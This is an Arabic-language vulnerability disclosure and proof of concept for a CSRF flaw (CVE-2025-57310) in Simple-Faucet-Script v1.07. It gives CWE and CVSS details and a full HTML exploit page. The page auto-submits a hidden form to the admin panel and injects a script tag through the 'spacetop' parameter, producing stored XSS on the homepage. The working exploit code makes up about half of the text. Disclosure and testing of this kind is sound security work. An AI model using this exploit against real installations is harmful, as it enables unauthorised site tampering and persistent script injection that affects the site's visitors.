
إثبات مفهوم لاستغلال CVE-2025-57310: ثغرة CSRF في Simple-Faucet-Script v1.07 تُمكّن من تخزين XSS عبر طلبات POST مصمَّمة إلى لوحة المشرف.
ثغرة تزوير الطلبات عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script الإصدار 1.07 عبر طلب POST مصمم إلى admin.php?p=ads&c=1 تتيح للمهاجمين تنفيذ تعليمات برمجية عشوائية.
CWE-352: تزوير الطلبات عبر المواقع (CSRF)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
المنتج عرضة لثغرة تزوير الطلبات عبر المواقع (CSRF) في لوحة الإدارة. عندما يزور مدير مصادق صفحة ضارة تحتوي على الإثبات المفاهيمي (PoC)، يؤدي هجوم CSRF إلى تعديل غير مصرح به لمحتوى الصفحة الرئيسية.
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<h3>Standard CSRF PoC</h3>
<form action="https://example.com/admin.php?p=ads&c=1" method="post">
<input type="hidden" name="spacetop" value="<script>alert();</script>" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
يمكن للمهاجم حقن HTML/JavaScript عشوائي في الصفحة الرئيسية عبر المعامل spacetop، مما يؤدي إلى حدوث ثغرة XSS مخزنة (Stored Cross-Site Scripting).